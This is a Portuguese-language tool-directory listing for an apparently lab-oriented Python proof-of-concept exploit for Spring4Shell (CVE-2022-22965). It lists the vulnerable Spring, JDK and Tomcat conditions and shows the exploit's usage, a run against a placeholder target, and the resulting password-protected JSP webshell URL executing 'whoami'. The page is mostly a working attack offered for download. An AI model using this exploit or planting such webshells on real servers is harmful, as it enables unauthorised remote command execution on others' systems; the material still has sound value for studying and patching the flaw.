Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Spring4Shell-CVE-2022-22965 — Exploit de prova de conceito baseado em Python para CVE-2022-22965 (Spring4Shell) que visa RCE no Java Spring Core no Apache Tomcat. Faz upload de um webshell JSP com proteção por senha para execução remota de comandos. | Kitploit
Ferramentas/GitHubGitHub/sohamsharma966/spring4shell-cve-2022-22965
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubsohamsharma966/spring4shell-cve-2022-22965

Spring4Shell-CVE-2022-22965

Exploit de prova de conceito baseado em Python para CVE-2022-22965 (Spring4Shell) que visa RCE no Java Spring Core no Apache Tomcat. Faz upload de um webshell JSP com proteção por senha para execução remota de comandos.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
1há 3 anosAinda não revisado
Compartilhar

Spring4Shell: CVE-2022-22965 RCE

Vulnerabilidade RCE no framework Java Spring

Essa vulnerabilidade afeta um componente "Spring Core" — o coração do framework

Condições atuais para a vulnerabilidade:-

  • JDK 9+
  • Uma versão vulnerável do Spring Framework (<5.2 | 5.2.0-19 | 5.3.0-17)
  • Apache Tomcat como servidor para a aplicação Spring, empacotado como WAR
  • Dependência dos componentes spring-webmvc e/ou spring-webflux do Spring Framework

O exploit

root@kitploit:~
user@attacker:~$ ./exploit.py --help
usage: exploit.py [-h] [-f FILENAME] [-p PASSWORD] [-d DIRECTORY] url

Spring4Shell RCE Proof of Concept

positional arguments:
  url                   Target URL

optional arguments:
  -h, --help            show this help message and exit
  -f FILENAME, --filename FILENAME
                        Name of the file to upload (Default tomcatwar.jsp)
  -p PASSWORD, --password PASSWORD
                        Password to protect the shell with (Default: thm)
  -d DIRECTORY, --directory DIRECTORY
                        The upload path for the file (Default: ROOT)
root@kitploit:~
user@attacker:~$ ./exploit.py http://MACHINE_IP/
Shell Uploaded Successfully!


# OUTPUT= Your shell can be found at: http://MACHINE_IP/tomcatwar.jsp?pwd=thm&cmd=whoami
Baixar ferramenta